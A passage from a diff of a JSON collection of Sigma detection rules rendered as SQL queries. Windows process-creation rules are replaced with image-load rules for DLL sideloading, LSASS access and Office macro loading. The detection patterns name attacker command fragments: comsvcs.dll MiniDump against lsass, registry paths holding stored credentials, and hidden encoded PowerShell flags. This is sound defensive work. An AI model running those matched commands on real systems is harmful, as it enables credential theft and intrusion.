WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_gpscript.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "title": "PowerShell Core DLL Loaded By Non PowerShell Process", + "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "status": "experimental", + "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. 
Detects behaviour similar to meterpreter's \"load powershell\" extension.", + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "tags": [ + "attack.t1059.001", + "attack.execution" + ], "falsepositives": [ - "Administrative activity" + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_dll_system_management_automation_susp_load.yml" }, { - "title": "Suspicious MsiExec Embedding Parent", - "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "title": "System Drawing DLL Load", + "id": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "author": "frack113", + "description": "Detects processes loading \"System.Drawing.ni.dll\". This could be an indicator of potential Screen Capture.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1218.007", - "attack.defense_evasion" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Unknown" + "False positives are very common from system and third party applications, activity needs to be investigated. 
This rule is best correlated with other events to increase the level of suspiciousness" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\System.Drawing.ni.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_msiexec_embedding.yml" + "filename": "image_load_dll_system_drawing_load.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Potential Wazuh Security Platform DLL Sideloading", + "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Many legitimate applications leverage this DLL. 
(Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_wazuh.yml" }, { - "title": "Enumeration for 3rd Party Creds From CLI", - "id": "87a476dc-0079-4583-a985-dee7a20a03de", - "status": "experimental", - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "status": "test", + "description": "Detects VB DLL's loaded by an office application. 
Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "PUA - Adidnsdump Execution", - "id": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", - "status": "test", - "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", - "author": "frack113", + "title": "Third Party Software DLL Sideloading", + "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%adidnsdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program 
Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_python_adidnsdump.yml" + "filename": "image_load_side_load_third_party.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE 
'%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", - "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "title": "Unsigned Image Loaded Into LSASS Process", + "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", "status": "test", - "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", - "author": "@neu5ron", + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.persistence", - "attack.t1542.003" + "attack.credential_access", + "attack.t1003.001" + ], + 
"falsepositives": [ + "Valid user connecting using RDP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" ], - "filename": "proc_creation_win_bcdedit_susp_execution.yml" + "filename": "image_load_unsigned_image_loaded_into_lsass.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", - "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "status": "test", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. 
An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ "attack.credential_access", - 
"attack.t1003.002", - "attack.t1003.003" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal 
no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", - "status": "test", - "description": "Detects potential reconnaissance 
activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "title": "VMGuestLib DLL Sideload", + "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "status": "experimental", + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Rare System Admin Activity" + "FP could occur if the legitimate version of vmGuestLib already exists on the system" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "image_load_side_load_vmguestlib.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - 
"attack.execution" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", - "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CLR DLL Loaded Via Office Applications", + "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "status": "test", + "description": "Detects CLR DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded 